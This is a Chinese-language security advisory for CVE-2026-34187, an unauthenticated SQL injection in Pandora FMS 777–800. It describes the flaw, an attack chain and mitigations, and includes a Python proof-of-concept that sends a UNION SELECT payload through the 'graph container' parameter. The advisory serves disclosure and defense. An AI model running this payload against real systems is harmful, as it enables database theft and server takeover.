IPBUF安全漏洞报告
English
CVE-2026-34187 CVSS 9.8 严重

CVE-2026-34187 Pandora FMS SQL注入漏洞

披露日期: 2026-05-12

漏洞信息

漏洞编号
CVE-2026-34187
漏洞类型
SQL注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Pandora FMS

相关标签

SQL注入Pandora FMSRCE无需认证严重漏洞

漏洞概述

Pandora FMS在777至800版本中存在严重的SQL注入漏洞。由于graph container参数未正确过滤特殊字符,攻击者无需认证即可通过网络发送恶意SQL语句。该漏洞可能导致数据库信息泄露、数据篡改或服务器被完全控制,对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞根因在于Pandora FMS处理用户输入时,对graph container参数缺乏严格的输入验证和特殊字符转义机制。应用程序未能正确净化用户输入,直接将其拼接到后端SQL查询语句中,导致了经典的SQL注入漏洞。攻击者无需经过身份认证(PR:N),即可通过网络向受影响端点发送特制的恶意HTTP请求。利用此漏洞,攻击者可以注入恶意的SQL语法,通过联合查询、报错注入或布尔盲注等方式窃取数据库中的敏感信息(如管理员账户密码、系统配置等)。此外,根据数据库权限不同,攻击者还可能执行写入操作,从而写入WebShell或破坏数据完整性,严重威胁系统安全。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别运行Pandora FMS 777至800版本的目标服务器。
STEP 2
武器化
攻击者构造针对'graph container'参数的恶意SQL注入Payload,旨在提取数据库信息或执行系统命令。
STEP 3
交付
攻击者向目标Pandora FMS服务器的相关接口发送包含恶意Payload的HTTP请求。
STEP 4
利用
服务器后端未过滤特殊字符,直接将Payload拼接到SQL语句中执行,导致数据库返回敏感信息或执行恶意操作。
STEP 5
达成目标
攻击者成功获取管理员凭据或系统权限,进而控制服务器或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://target-ip/pandora_console/index.php" # The vulnerability lies in the 'graph container' parameter # Attackers can inject SQL payloads here without authentication. payload = "1' UNION SELECT NULL, user(), database()-- -" # Example parameters structure (may vary based on specific endpoint) params = { "sec2": "operation/agentes/ver_agente", "id_agente": "1", "graph_container": payload } try: # Send malicious request response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully!") print("[+] Check the response content for database output:") print(response.text[:500]) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}")

影响范围

Pandora FMS 777
Pandora FMS 778
Pandora FMS 779
Pandora FMS 800

防御指南

临时缓解措施
在未完成修复升级前,建议在网络边界部署Web应用防火墙(WAF),配置规则拦截针对'graph container'参数的SQL注入攻击特征;同时严格限制数据库账户的访问权限,确保Web应用连接账户不具备写入或执行敏感命令的权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表